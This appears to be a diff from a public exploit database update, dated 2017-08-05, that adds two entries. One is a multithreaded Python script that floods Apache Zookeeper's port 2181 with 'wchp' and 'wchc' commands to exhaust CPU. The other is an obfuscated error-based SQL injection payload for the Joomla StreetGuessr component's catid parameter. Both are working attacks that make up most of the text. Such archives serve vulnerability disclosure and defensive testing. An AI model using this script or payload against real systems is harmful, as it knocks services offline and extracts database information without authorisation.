DB: 2017-08-05

2 new exploits

Zookeeper 3.5.2 Client - Denial of Service

Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection

files.csv

@@ -5605,6 +5605,7 @@ id,file,description,date,author,platform,type,port
 42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
 42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0
 42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0
+42294,platforms/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",multiple,dos,2181
 42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
 42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
 42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
@@ -38225,4 +38226,5 @@ id,file,description,date,author,platform,type,port
 42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
+42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
 42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0

platforms/multiple/dos/42294.py

@@ -0,0 +1,85 @@
+#!/usr/bin/python
+
+# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
+# Date: 2/7/2017
+# Exploit Author: Brandon Dennis
+# Email: bdennis@mail.hodges.edu
+# Software Link: http://zookeeper.apache.org/releases.html#download
+# Zookeeper Version: 3.5.2
+# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
+# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. 
+#	This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. 
+#	The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
+#	This should effect Linux x86 & x64 as well
+
+
+
+import time
+import os
+import threading
+import sys
+import socket
+
+numOfThreads = 1
+exitStr = "n"
+stop_threads = False
+threads = []
+ipAddress = "192.168.1.5" #Change this
+port = 2181
+
+def sendCommand(ipAddress, port):
+	try:
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.connect((ipAddress, port))
+		s.send("wchp\r".encode("utf-8"))
+		s.recv(1024)
+		s.send("wchc\r".encode("utf-8"))
+		s.close()
+	except:
+		pass
+
+	
+def runCMD(id, stop, ipAddress, port):
+	while True:
+		sendCommand(ipAddress, port)
+		if stop():
+			break
+	return
+	
+def welcomeBanner():
+	banner = """ _______   __  _____               _               
+|___  | | / / /  __ \             | |              
+   / /| |/ /  | /  \/_ __ __ _ ___| |__   ___ _ __ 
+  / / |    \  | |   | '__/ _` / __| '_ \ / _ | '__|
+./ /__| |\  \ | \__/| | | (_| \__ | | | |  __| |   
+\_____\_| \_/  \____|_|  \__,_|___|_| |_|\___|_|   
+                                                   
+                 By: Brandon Dennis 
+		 Email: bdennis@mail.hodges.edu
+				 """
+	print(banner)
+	
+
+welcomeBanner()
+numOfThreads = int(input("How many threads do you want to use: "))
+print ("Startin Up Threads...")	
+for i in range(numOfThreads):
+	t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
+	threads.append(t)
+	t.start()
+print("Threads are now started...")
+	
+
+while exitStr != "y":
+	inpt = input("Do you wish to stop threads(y): ")
+	
+	if inpt == "y":
+		exitStr = "y"
+
+print("\nStopping Threads...")
+stop_threads = True		
+for thread in threads:
+	thread.join()
+		
+print("Threads are now stopped...")
+sys.exit(0);

platforms/php/webapps/42423.txt

@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
+# Dork: N/A
+# Date: 03.08.2017
+# Vendor : https://www.nordmograph.com/
+# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
+# Demo: https://www.streetguessr.com/en/component/streetguess/
+# Version: 1.1.8
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
+# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-
+# Etc..
+# # # # #